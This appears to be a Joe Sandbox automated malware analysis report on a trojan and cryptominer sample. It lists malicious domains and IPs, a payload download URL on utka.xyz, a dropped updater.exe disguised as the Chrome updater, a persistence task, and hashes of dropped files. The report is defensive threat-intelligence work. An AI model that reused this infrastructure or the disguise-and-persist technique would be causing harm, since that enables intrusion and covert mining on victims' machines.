https://nuget.org/nuget.exe	0%	URL Reputation	safe
https://aka.ms/pscore68	0%	URL Reputation	safe
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
utka.xyz	84.32.84.109	true	true		unknown
s-part-0017.t-0009.t-msedge.net	13.107.246.45	true	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://utka.xyz/1234.exe	false		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000018.00000002.1759888871.0000014DD5CD3000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://aka.ms/winsvr-2022-pshelp	powershell.exe, 00000018.00000002.1729262490.0000014DC5E89000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702	lsass.exe, 0000001E.00000000.1703894174.00000161C642F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001E.00000002.2667571192.00000161C642F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://utka.xyz	zufmUwylvo.exe, 00000000.00000002.1705706882.000001B600001000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000018.00000002.1729262490.0000014DC5E89000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/09/policy	lsass.exe, 0000001E.00000000.1703894174.00000161C642F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001E.00000002.2667571192.00000161C642F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.microsoft.coi/certs/MicRooCerAut_2010-06-23.crt0	powershell.exe, 00000018.00000002.1774198630.0000014DDE299000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000018.00000002.1729262490.0000014DC5E89000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000018.00000002.1729262490.0000014DC5E89000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://www.microsoft.co	powershell.exe, 00000018.00000002.1774198630.0000014DDE299000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1775594830.0000014DDE389000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://contoso.com/License	powershell.exe, 00000018.00000002.1759888871.0000014DD5CD3000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000018.00000002.1759888871.0000014DD5CD3000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/wsdl/a	lsass.exe, 0000001E.00000000.1703894174.00000161C642F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001E.00000002.2667571192.00000161C642F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/ws/2005/02/trust	lsass.exe, 0000001E.00000000.1703894174.00000161C642F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001E.00000002.2667571192.00000161C642F000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.micro	svchost.exe, 0000002F.00000000.1811725307.000002992A3E0000.00000002.00000001.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 00000018.00000002.1729262490.0000014DC5E89000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/ws/2005/07/securitypolicy	lsass.exe, 0000001E.00000002.2668510529.00000161C644F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001E.00000000.1703967455.00000161C644F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/wsdl/soap12/	lsass.exe, 0000001E.00000000.1703894174.00000161C642F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001E.00000002.2667571192.00000161C642F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000018.00000002.1729262490.0000014DC5E89000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 0000001E.00000000.1703894174.00000161C642F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001E.00000002.2667571192.00000161C642F000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/	powershell.exe, 00000018.00000002.1759888871.0000014DD5CD3000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000018.00000002.1759888871.0000014DD5CD3000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://xmrig.com/docs/algorithms	updater.exe, 0000002D.00000002.1900732139.000000014001C000.00000004.00000001.01000000.0000000B.sdmp	false		unknown
http://Passport.NET/tb	svchost.exe, 00000028.00000000.1781187667.00000279FEFD0000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://aka.ms/pscore68	powershell.exe, 00000018.00000002.1729262490.0000014DC5C61000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://docs.oasis-open.org/ws-sx/ws-trust/200512	lsass.exe, 0000001E.00000002.2668510529.00000161C644F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001E.00000000.1703967455.00000161C644F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd	lsass.exe, 0000001E.00000000.1703894174.00000161C642F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001E.00000002.2667571192.00000161C642F000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	zufmUwylvo.exe, 00000000.00000002.1705706882.000001B600001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1729262490.0000014DC5C61000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.microsoft.cob	powershell.exe, 00000018.00000002.1775594830.0000014DDE389000.00000004.00000020.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
84.32.84.109	utka.xyz	Lithuania		33922	NTT-LT-ASLT	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1530000
Start date and time:	2024-10-09 16:14:59 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 11m 21s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	38
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	15
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	zufmUwylvo.exe renamed because original name is a hash value
Original Sample Name:	53ad8953df55fbe65065f3e94135a4596f6209f20947c0e3df949910ce6cbbc6.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.mine.winEXE@54/79@1/1
EGA Information:	Successful, ratio: 88.2%
HCA Information:	Successful, ratio: 100% Number of executed functions: 83 Number of non-executed functions: 365
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe, schtasks.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 13.89.179.12
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, login.live.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, pool.hashvault.pro, umwatson.events.data.microsoft.com, onedsblobprdcus17.centralus.cloudapp.azure.com, pastebin.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 2924 because it is empty
Execution Graph export aborted for target zufmUwylvo.exe, PID 8104 because it is empty
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: zufmUwylvo.exe

Simulations

Behavior and APIs

Time	Type	Description
10:16:24	API Interceptor	1x Sleep call for process: zxcvbnmasd.exe modified
10:16:28	API Interceptor	47x Sleep call for process: powershell.exe modified
10:16:32	API Interceptor	1x Sleep call for process: WerFault.exe modified
10:16:47	API Interceptor	1x Sleep call for process: updater.exe modified
10:17:05	API Interceptor	195773x Sleep call for process: winlogon.exe modified
10:17:06	API Interceptor	142108x Sleep call for process: lsass.exe modified
10:17:07	API Interceptor	2434x Sleep call for process: svchost.exe modified
10:17:10	API Interceptor	161535x Sleep call for process: dwm.exe modified
16:16:36	Task Scheduler	Run new task: GoogleUpdateTaskMachineQC path: C:\Program Files\Google\Chrome\updater.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
84.32.84.109	jql.jar	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
s-part-0017.t-0009.t-msedge.net	http://email.mx02.email-max.com/c/eJw8zrFy8iAAAOCnge33EEjAgcE_LVFrvcb0Wu3iQQDDBaLGxIt9-p4dOn_LZ0Q1m6HKQiumDHPKKCMM1kI7rozj1BnmEj5DjjuiqCOGpJozXkEvkjSdpoQiQFEc0XRio_LhX1TjpDpFGETd92dA5gBLgOWptcG3jTcPBFj2AEuaFV_LN7Tf7-7_E7QaLx3Khxw1K71E-e6pxgnA8naZl8-fi_O2zV77fN583DZDuZZZua1d-b3JYlduxvXw0haq6oti8d55GeyoOt_CeD9Ee72qoz148_eFnVDa2OCDqidKm9PQaEDR8dH_rd8E_gkAAP__7g5YOw	Get hash	malicious	Phisher	Browse	13.107.246.45
	SecuriteInfo.com.Win64.MalwareX-gen.29931.26049.exe	Get hash	malicious	Unknown	Browse	13.107.246.45
	IjqafXhE5c.exe	Get hash	malicious	Unknown	Browse	13.107.246.45
	7Y457tN7YH.exe	Get hash	malicious	FormBook	Browse	13.107.246.45
	#U00e7izim.xlam.xlsx	Get hash	malicious	Unknown	Browse	13.107.246.45
	PAYMENT APPLICATION.xls	Get hash	malicious	Unknown	Browse	13.107.246.45
	9od7uqtxVz.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	13.107.246.45
	35iI1h0fHW.exe	Get hash	malicious	FormBook	Browse	13.107.246.45
	Narzedzie_do_OE_GR (1).xlsb	Get hash	malicious	Unknown	Browse	13.107.246.45
	9EIf7Sfk3P.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	13.107.246.45
utka.xyz	System.exe	Get hash	malicious	Flesh Stealer, Xmrig	Browse	191.101.104.168
utka.xyz	System.exe	Get hash	malicious	Xmrig	Browse	91.108.98.180

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
NTT-LT-ASLT	L7mZZNG72D.exe	Get hash	malicious	FormBook	Browse	84.32.84.32
	XMRVhU3b3U.exe	Get hash	malicious	FormBook	Browse	84.32.84.32
	8EhMjL3yNF.exe	Get hash	malicious	FormBook	Browse	84.32.84.32
	BILL OF LADDING.exe	Get hash	malicious	FormBook	Browse	84.32.84.32
	BAJFMONYm2.exe	Get hash	malicious	FormBook	Browse	84.32.84.32
	oLCnCWQDhK.exe	Get hash	malicious	FormBook	Browse	84.32.84.32
	N2Qncau2rN.exe	Get hash	malicious	FormBook	Browse	84.32.84.32
	RQ#071024.exe	Get hash	malicious	FormBook	Browse	84.32.84.32
	8mmZ7Bkoj1.exe	Get hash	malicious	FormBook	Browse	84.32.84.32
	Products Order Catalogs20242.exe	Get hash	malicious	FormBook	Browse	84.32.84.32

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	gGcpYEOr8U.exe	Get hash	malicious	Unknown	Browse	84.32.84.109
	y3k7sqXPiV.exe	Get hash	malicious	Unknown	Browse	84.32.84.109
	IDriveWinSetup.exe	Get hash	malicious	Phisher	Browse	84.32.84.109
	https://travelofarecom.wordpress.com/	Get hash	malicious	Unknown	Browse	84.32.84.109
	http://email.mx02.email-max.com/c/eJw8zrFy8iAAAOCnge33EEjAgcE_LVFrvcb0Wu3iQQDDBaLGxIt9-p4dOn_LZ0Q1m6HKQiumDHPKKCMM1kI7rozj1BnmEj5DjjuiqCOGpJozXkEvkjSdpoQiQFEc0XRio_LhX1TjpDpFGETd92dA5gBLgOWptcG3jTcPBFj2AEuaFV_LN7Tf7-7_E7QaLx3Khxw1K71E-e6pxgnA8naZl8-fi_O2zV77fN583DZDuZZZua1d-b3JYlduxvXw0haq6oti8d55GeyoOt_CeD9Ee72qoz148_eFnVDa2OCDqidKm9PQaEDR8dH_rd8E_gkAAP__7g5YOw	Get hash	malicious	Phisher	Browse	84.32.84.109
	345831980-17357046212.docx	Get hash	malicious	Unknown	Browse	84.32.84.109
	https://forms.zohopublic.com/tracyesmith/form/Processing/formperma/OwRtaxn46xyHexOvW9NGSoRj4ULObTZIo3_-Cp_3oLE	Get hash	malicious	Unknown	Browse	84.32.84.109
	GsZkXAmf61.exe	Get hash	malicious	Celestial Rat, EICAR	Browse	84.32.84.109
	2JHGWjmJ46.exe	Get hash	malicious	AgentTesla	Browse	84.32.84.109
	AYV0eq1Gyc.exe	Get hash	malicious	AgentTesla	Browse	84.32.84.109

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Program Files\Google\Libs\WR64.sys	0NSjUT34gS.exe	Get hash	malicious	Phorpiex, Xmrig	Browse
	eshkere.bat	Get hash	malicious	Xmrig	Browse
	frik.exe	Get hash	malicious	Xmrig	Browse
	Google Chrome.exe	Get hash	malicious	Xmrig	Browse
	e7WMhx18XN.exe	Get hash	malicious	SilentXMRMiner, Xmrig	Browse
	GcqJPBLD2Q.exe	Get hash	malicious	BitCoin Miner, SilentXMRMiner, UACMe, Xmrig	Browse
	C5Lg2JSPlD.exe	Get hash	malicious	SilentXMRMiner, Xmrig	Browse
	TwrhjEKqxk.exe	Get hash	malicious	Xmrig	Browse
	aA45th2ixY.exe	Get hash	malicious	Xmrig	Browse
	1mqzOM6eok.exe	Get hash	malicious	Xmrig	Browse

Created / dropped Files

C:\Program Files\Google\Chrome\updater.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	20970496
Entropy (8bit):	7.80864463332949
Encrypted:	false
SSDEEP:	393216:mE0t6YZQ+hEO1CGk9rNVdXlTvr6EaYOHLfwS1hQeJpsQ:mttRQSYGk9rhh6aQfwQhQ
MD5:	413E4E7BC129E8165D1FFD2B1AE5DB04
SHA1:	1EA09F97D200319F1582AEB8F4084D80B0D61DFA
SHA-256:	B388D2B53453ADD11982A0E5B86EE01BBAF318EE77483300731D2202CE906146
SHA-512:	FB37421F14D673587DF501051C1DE9E36C4DF07B5871AF391E71A6269E5E42BCE70CC7841C6E55D0383871248A4DC520C9DEB1B9E4CFAB4C86BB6C1C21F89DEE
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 29%
Preview:	MZ......................@.......................................hr......!..L.!This program cannot be run in DOS mode....$.......PE..d......f........../....&.....\[..&..R.]........@..............................@.....R.@... ... ..............................................4^.<.....@..... .@..;..............................................(....................... ............................text... ...........................`..`.data....,Y.........................@....rdata...>....Z.....................@..@.pdata.......0[.....................@..@.xdata..@....P[.....................@..@.bss.....%...`[..........................idata..4.....[.....................@....CRT....`.....[.....................@....tls..........[.....................@....yuZ..........[.....................@..@.e;T....N.....[..................... ..`."Ki....X...........................@.....>f......?.......?.................`..h.rsrc.........@.......?.............@..@................................................

C:\Program Files\Google\Libs\WR64.sys

Download File

Process:	C:\Program Files\Google\Chrome\updater.exe
File Type:	PE32+ executable (native) x86-64, for MS Windows
Category:	dropped
Size (bytes):	14544
Entropy (8bit):	6.2660301556221185
Encrypted:	false
SSDEEP:	192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
MD5:	0C0195C48B6B8582FA6F6373032118DA
SHA1:	D25340AE8E92A6D29F599FEF426A2BC1B5217299
SHA-256:	11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
SHA-512:	AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 5%
Joe Sandbox View:	Filename: 0NSjUT34gS.exe, Detection: malicious, Browse Filename: eshkere.bat, Detection: malicious, Browse Filename: frik.exe, Detection: malicious, Browse Filename: Google Chrome.exe, Detection: malicious, Browse Filename: e7WMhx18XN.exe, Detection: malicious, Browse Filename: GcqJPBLD2Q.exe, Detection: malicious, Browse Filename: C5Lg2JSPlD.exe, Detection: malicious, Browse Filename: TwrhjEKqxk.exe, Detection: malicious, Browse Filename: aA45th2ixY.exe, Detection: malicious, Browse Filename: 1mqzOM6eok.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.\|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..\|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_zufmUwylvo.exe_f86f6f72c3e73a99d55943cbbe3ae9759d54_728e4a88_3b0a3bc7-4744-421c-963f-2bcded8cd5a0\Report.wer

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.3560595036710736
Encrypted:	false
SSDEEP:	192:CI8XnJy0waf2aWB+9lR1yi4+GzuiFSZ24lO8jMV:Z0nXwaf2amUjxbGzuiFSY4lO8j
MD5:	258B0E21AE76D487771C373235A62EE0
SHA1:	76C442E244286F68F0C65557D6632E725AFF2E3C
SHA-256:	15BB7FBED0CF567B4162F2931949A92BD7C22F24342D33020A62CF15CBAEA03C
SHA-512:	482095B31239D94DE5A0C3D82EC55CEF33FA0FF2DBD662CDA894444CD078854EF16EEBD9EFAD61E30F677EA35042AE9BA4FE3858C15997637D77CE0752332A69
Malicious:	true
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.9.5.6.9.8.5.9.4.1.9.1.3.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.9.5.6.9.8.7.9.2.6.3.0.1.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.b.0.a.3.b.c.7.-.4.7.4.4.-.4.2.1.c.-.9.6.3.f.-.2.b.c.d.e.d.8.c.d.5.a.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.2.a.4.2.d.4.3.-.d.e.1.0.-.4.0.1.f.-.a.5.1.e.-.4.0.4.f.0.3.f.8.a.d.0.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.z.u.f.m.U.w.y.l.v.o...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.S.y.s.t.e.m...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.f.a.8.-.0.0.0.1.-.0.0.1.3.-.e.1.a.4.-.0.0.c.1.5.5.1.a.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.a.2.1.e.d.f.e.5.5.e.4.f.4.1.0.4.5.6.d.8.3.c.9.2.2.1.1.8.7.9.9.7.0.0.0.0.0.0.0.0.!.0.0.0.0.b.7.1.9.c.9.c.6.4.a.5.3.6.8.a.b.f.2.6.7.1.a.0.e.8.d.6.e.f.8.9.0.2.b.d.a.f.9.a.a.!.z.u.f.m.U.w.y.l.v.o...e.x.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1505.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8790
Entropy (8bit):	3.695408634954323
Encrypted:	false
SSDEEP:	192:R6l7wVeJjCsy76YWL4hgmfZqYpDO89b5gHfUTm:R6lXJdG6YqmgmfgS5QfN
MD5:	AD26AA4DB89392BFD21D4AF188B96CA3
SHA1:	042863F8A4CE23763BA2DF6DE55F6790E86EC60C
SHA-256:	79BDBCD2659103447182B348DEDD928BD38D4A7EC8B4E1826AF3C75617701454
SHA-512:	554C79AE5148A4035B2334BBAF6B021513419F84D5DB2389A0B2D9534CBC5F9E49C61805526C0B2ED06F78DA716004D4936970E1C5D6C8446915A4FFC8CB77C4
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.8.1.0.4.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1544.tmp.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4753
Entropy (8bit):	4.42589151896425
Encrypted:	false
SSDEEP:	48:cvIwWl8zs6Jg771I9Q7nWpW8VYOYm8M4JltVPF9yq8v1tV4Da22ldLd:uIjfII7f7W7VqJdWIa227Ld
MD5:	BDFF66305CB08E6548C9ED88951CDAFC
SHA1:	92BDBDA38B1BC81A515C459065E4AEBCF3B3C9D8
SHA-256:	A67AE93843C945F67A520C0AD424F733E58949A0AEEA7689EBE63785ADD9AF8E
SHA-512:	FECED75CD5A59C6F2BAED9D8D92C05CB075D0EEAF74E4D3897AEC7B875206C84A66682A271F9604E65C3E3DAFA9EC6ABDC456A65562658F256BA1EFB75CA651A
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="535999" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE4D.tmp.dmp

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Mini DuMP crash report, 16 streams, Wed Oct 9 14:16:27 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	445526
Entropy (8bit):	3.120946825272043
Encrypted:	false
SSDEEP:	3072:udM14VRCG8cSLwb1CCqP8P83+v1Xb1SQoe:ud+SAsTqP8E3QFbd
MD5:	35CEFBB5272BFF1359A81C07A5A139C4
SHA1:	60D0A2D8BE7FF2AB7936C689F40F59A5CA6EC90E
SHA-256:	7B84B6AB1707442DD1707F355470290D841B9894A72C606BD56556EB5439600E
SHA-512:	1EC9EF46DD30515282033C1D85C19CFA8E66A4E9691C0C2CA9B43EB967956056A590F590CAC7D2CC14E1762EC6A1D361C0CDB3B8B73D08E8E93BFF5E5B8550E0
Malicious:	false
Preview:	MDMP..a..... .......;..g.........................(..........<...H2...........2.......2..............l.......8...........T............c...h..........$@...........B..............................................................................eJ.......B......Lw......................T..............g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3e0bzs3d.4yb.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_41mlyj2f.plr.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
